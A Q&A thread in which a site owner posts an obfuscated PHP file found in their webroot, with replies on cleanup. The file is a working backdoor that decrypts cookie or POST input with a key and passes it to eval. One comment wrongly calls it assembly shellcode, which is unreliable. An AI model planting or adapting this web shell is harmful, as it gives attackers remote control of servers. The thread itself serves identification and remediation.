# I found this strange code in root directory. Does it mean if my website hacked?

Tags: php, security

I am sorry to ask a silly question but I am not able to figure this out. I found a PHP file in my root directory with strange code. I know little bit PHP but this is a very strange code inside the PHP code. I am sure that it is not PHP functions. I don't know what is this code about.

Is my website compromised? Can some tell me that they can do with my website through this code. I am raising this question here because maybe this can help some one to save their websites.

```
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
$GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]] = $GLOBALS['t7004'][61].$GLOBALS['t7004'][4].$GLOBALS['t7004'][59];
$GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][79];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][53].$GLOBALS['t7004'][59].$GLOBALS['t7004'][92].$GLOBALS['t7004'][55].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][6].$GLOBALS['t7004'][77].$GLOBALS['t7004'][6].$GLOBALS['t7004'][2].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][32].$GLOBALS['t7004'][4].$GLOBALS['t7004'][32].$GLOBALS['t7004'][72].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][84].$GLOBALS['t7004'][77].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]] = $GLOBALS['t7004'][43].$GLOBALS['t7004'][56].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][2].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][6].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][49].$GLOBALS['t7004'][75].$GLOBALS['t7004'][41].$GLOBALS['t7004'][10].$GLOBALS['t7004'][62].$GLOBALS['t7004'][13];
$GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]] = $GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][71].$GLOBALS['t7004'][13].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] = $_POST;
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] = $_COOKIE;
@$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74], NULL);
@$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83], 0);
@$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][52].$GLOBALS['t7004'][56].$GLOBALS['t7004'][64].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][64].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][84].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55], 0);
@$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]](0);

$rcc6ec6 = NULL;
$e6ca3e0 = NULL;

$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][29].$GLOBALS['t7004'][10].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][10].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][61].$GLOBALS['t7004'][10].$GLOBALS['t7004'][56].$GLOBALS['t7004'][85].$GLOBALS['t7004'][55].$GLOBALS['t7004'][0].$GLOBALS['t7004'][71].$GLOBALS['t7004'][61].$GLOBALS['t7004'][55].$GLOBALS['t7004'][13].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][85].$GLOBALS['t7004'][0].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][75].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][71].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][55].$GLOBALS['t7004'][29];
global $c6278d728;

function f7684f5ee($rcc6ec6, $r8c6)
{
    $ua52559 = "";

    for ($o4b1=0; $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6);)
    {
        for ($b1ad67b=0; $b1ad67b<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($r8c6) && $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6); $b1ad67b++, $o4b1++)
        {
            $ua52559 .= $GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]]($GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($rcc6ec6[$o4b1]) ^ $GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($r8c6[$b1ad67b]));
        }
    }

    return $ua52559;
}

function y10245($rcc6ec6, $r8c6)
{
    global $c6278d728;

    return $GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($rcc6ec6, $c6278d728), $r8c6);
}

foreach ($GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] as $r8c6=>$ob6137983)
{
    $rcc6ec6 = $ob6137983;
    $e6ca3e0 = $r8c6;
}

if (!$rcc6ec6)
{
    foreach ($GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] as $r8c6=>$ob6137983)
    {
        $rcc6ec6 = $ob6137983;
        $e6ca3e0 = $r8c6;
    }
}

$rcc6ec6 = @$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]]($rcc6ec6), $e6ca3e0));
if (isset($rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]]) && $c6278d728==$rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]])
{
    if ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][6])
    {
        $o4b1 = Array(
            $GLOBALS['t7004'][32].$GLOBALS['t7004'][72] => @$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]](),
            $GLOBALS['t7004'][83].$GLOBALS['t7004'][72] => $GLOBALS['t7004'][75].$GLOBALS['t7004'][9].$GLOBALS['t7004'][41].$GLOBALS['t7004'][0].$GLOBALS['t7004'][75],
        );
        echo @$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]]($o4b1);
    }
    elseif ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][55])
    {
        eval($rcc6ec6[$GLOBALS['t7004'][79]]);
    }
    exit();
}
```

Comment: if you haven't installed a bought piece of software that's just *obfuscated* (ask your vendor about it): jup. roll back to the last clean version, update all installed software, thoroughly audit every piece of code you wrote yourself, change all your passwords, notify your users.

Comment: thanks for your response. Yes I have removed the code but just want to know that in which area it  can effect my website.

Comment: impossible to tell. the whole *point* of obfuscated code is so that it's impossible to determine what it does by looking at the code.

Comment: If you installed a 3rd party application, usually free on the web it could have been included with it. I had a case where a designer installed a free theme with something similar. I would recommend, downloading all php files and search them for similar code (maybe notepad++) or using bash. These (usually spam) scripts have a tendency to be replicated in several folders.

Comment: Thanks guys for your effort. I dig for this on internet and finally found that this is a encrypted shellcode. which written in low level assembly languages and it is very powerful. Attacker can  access and control your system, server and have complete control on your website. Franz is right, This code is nearly impossible to decode because it has several layer and very difficult to understand.

Comment: You found this in the root directory of your site (the webroot) or the root directory of your server ('/')?  In either case, this is a bad situation and has obvious security implications.  One thing you know right of the bat, is that your configuration is not good.  Permissions for directories that are writable by php should be strictly controlled by you.   Clearly permissions are too permissive. It also help to know the OS, (if linux, distro) and webstack (LAMP, LNMP etc)

Answer (score 0):

(I'm not able yet to answer)

I had similar code on a customer website with a joomla install, several times.
If your webhost hasn't a code-checker were it blacklists hacked files, you should have to search the whole public_html directory.

I had one recent case where the code included several new files in a wordpress install, across different folders and some hidden with even meaningful names. I had to go thorugh every folder and check files with the same date (the hacking date - last modification) and go through each one to check if it was completely malicious code or just partly.

But usually I radically delete sections and files with encrypted code, they generally are hacked files...

Answer (score 0):

The code you have posted is obfuscated PHP.  The string at the beginning with all the `\x` 's in it is a hex representation of a string.

There is a neat site named "DDecode" I found here: [Hex Decoder](http://ddecode.com/hexdecoder/) which will attempt to do exactly what it says.

Plugging your code into that site we can see that the first part:

```
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
```

becomes:

```
<?php ${"GLOBALS"}['t7004'] = "-#_]hEi:\xa.29`5D\x9Yj{P\xd}W+)S~V7HFp|INR%&BZ0*bQ/<3MyT;mt"eaqor^c4[xwOXCG@fvAg1=nLdU?$su6(>!z8,lK'kJ\";
```

I am not super familiar with PHP myself, however we can see that a variable is being set here to a long, apparently random string.  From there we can look at the rest of the code and see that it is almost entirely a series of references back to this initial string.  In this way the attacker has hidden what their code is doing by making it appear nonsensical, which is the point of obfuscation of course.

You could take the time to dereference all of those calls if you wanted to try and get a better idea of what the code is doing.  Also there may be some security researchers who would be interested in seeing this code and could possibly give you more insight into what it is doing.

As for the state of your website - if you didn't do this then yes, the chances are highly likely it has been compromised and you should **at a minimum**, as the comments suggested:

- roll back to a clean, known good version
- update your host with any applicable patches
- INFORM YOUR USERS!  Especially since you are unsure what this code does it is important to let your users know that your site has potentially been compromised so they can take the appropriate actions.